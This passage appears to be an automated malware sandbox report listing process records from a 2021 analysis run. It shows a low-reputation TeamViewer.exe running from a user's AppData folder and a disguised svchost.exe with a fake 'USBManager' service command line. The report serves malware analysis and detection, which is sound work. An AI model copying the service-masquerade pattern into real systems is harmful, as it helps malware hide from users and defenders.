                                                                                                                                    Start date:15/09/2021
                                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                                    Imagebase:0x7ff797770000
                                                                                                                                    File size:51288 bytes
                                                                                                                                    MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Reputation:high

                                                                                                                                    General

                                                                                                                                    Start time:13:51:13
                                                                                                                                    Start date:15/09/2021
                                                                                                                                    Path:C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                    Commandline:C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
                                                                                                                                    Imagebase:0x400000
                                                                                                                                    File size:4375848 bytes
                                                                                                                                    MD5 hash:EBDBA07BFABCF24F5D79EF27247EA643
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Reputation:low

                                                                                                                                    General

                                                                                                                                    Start time:13:51:12
                                                                                                                                    Start date:15/09/2021
                                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                                                    Imagebase:0x7ff797770000
                                                                                                                                    File size:51288 bytes
                                                                                                                                    MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Reputation:high

                                                                                                                                    General

                                                                                                                                    Start time:13:51:21
                                                                                                                                    Start date:15/09/2021
                                                                                                                                    Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                    Commandline:c:\windows\syswow64\svchost.exe -k 'usbportsmanagergrp' -svcr 'teamviewer.exe' -s USBManager
                                                                                                                                    Imagebase:0x7ff797770000
                                                                                                                                    File size:44520 bytes
                                                                                                                                    MD5 hash:FA6C268A5B5BDA067A901764D203D433
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Reputation:high

                                                                                                                                    General

                                                                                                                                    Start time:13:51:21
                                                                                                                                    Start date:15/09/2021
                                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                    Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                                                                                                                                    Imagebase:0x230000
                                                                                                                                    File size:51288 bytes
                                                                                                                                    MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Reputation:high

                                                                                                                                    General

                                                                                                                                    Start time:13:51:22
                                                                                                                                    Start date:15/09/2021
                                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
                                                                                                                                    Imagebase:0x7ff797770000
                                                                                                                                    File size:51288 bytes
                                                                                                                                    MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:false
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Reputation:high

                                                                                                                                    General

                                                                                                                                    Start time:13:51:23
                                                                                                                                    Start date:15/09/2021
                                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
                                                                                                                                    Imagebase:0x7ff797770000
                                                                                                                                    File size:51288 bytes
                                                                                                                                    MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:false
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Reputation:high

                                                                                                                                    General

                                                                                                                                    Start time:13:51:23
                                                                                                                                    Start date:15/09/2021
                                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:C:\Windows\System32\svchost.exe -k NetworkService -p
                                                                                                                                    Imagebase:0x7ff797770000
                                                                                                                                    File size:51288 bytes
                                                                                                                                    MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:false
                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                    General

                                                                                                                                    Start time:13:51:24
                                                                                                                                    Start date:15/09/2021
                                                                                                                                    Path:C:\Windows\System32\SgrmBroker.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:C:\Windows\system32\SgrmBroker.exe
                                                                                                                                    Imagebase:0x7ff64e740000
                                                                                                                                    File size:163336 bytes
                                                                                                                                    MD5 hash:D3170A3F3A9626597EEE1888686E3EA6
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                    General

                                                                                                                                    Start time:13:51:25
                                                                                                                                    Start date:15/09/2021
                                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
                                                                                                                                    Imagebase:0x7ff797770000
                                                                                                                                    File size:51288 bytes
                                                                                                                                    MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:false
                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                    General

                                                                                                                                    Start time:13:51:32
                                                                                                                                    Start date:15/09/2021
                                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                                                    Imagebase:0x7ff797770000
                                                                                                                                    File size:51288 bytes
                                                                                                                                    MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                    General

                                                                                                                                    Start time:13:51:36
                                                                                                                                    Start date:15/09/2021
                                                                                                                                    Path:C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                    Commandline:'C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe' f
                                                                                                                                    Imagebase:0x400000
                                                                                                                                    File size:4375848 bytes
                                                                                                                                    MD5 hash:EBDBA07BFABCF24F5D79EF27247EA643
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                    General

                                                                                                                                    Start time:13:51:44
                                                                                                                                    Start date:15/09/2021
                                                                                                                                    Path:C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                    Commandline:'C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe' f
                                                                                                                                    Imagebase:0x400000
                                                                                                                                    File size:4375848 bytes
                                                                                                                                    MD5 hash:EBDBA07BFABCF24F5D79EF27247EA643
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                    General

                                                                                                                                    Start time:13:51:44
                                                                                                                                    Start date:15/09/2021
                                                                                                                                    Path:C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                    Commandline:C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
                                                                                                                                    Imagebase:0x400000
                                                                                                                                    File size:4375848 bytes
                                                                                                                                    MD5 hash:EBDBA07BFABCF24F5D79EF27247EA643
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                    General

                                                                                                                                    Start time:13:51:51
                                                                                                                                    Start date:15/09/2021
                                                                                                                                    Path:C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                    Commandline:C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
                                                                                                                                    Imagebase:0x400000
                                                                                                                                    File size:4375848 bytes
                                                                                                                                    MD5 hash:EBDBA07BFABCF24F5D79EF27247EA643
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                    General

                                                                                                                                    Start time:13:51:51
                                                                                                                                    Start date:15/09/2021
                                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                                                    Imagebase:0x7ff797770000
                                                                                                                                    File size:51288 bytes
                                                                                                                                    MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                    General

                                                                                                                                    Start time:13:52:26
                                                                                                                                    Start date:15/09/2021
                                                                                                                                    Path:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable
                                                                                                                                    Imagebase:0x7ff6b8640000
                                                                                                                                    File size:455656 bytes
                                                                                                                                    MD5 hash:A267555174BFA53844371226F482B86B
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:false
                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                    General

                                                                                                                                    Start time:13:52:28
                                                                                                                                    Start date:15/09/2021
                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                    Imagebase:0x7ff7ecfc0000
                                                                                                                                    File size:625664 bytes
                                                                                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:false
                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                    Disassembly

                                                                                                                                    Code Analysis
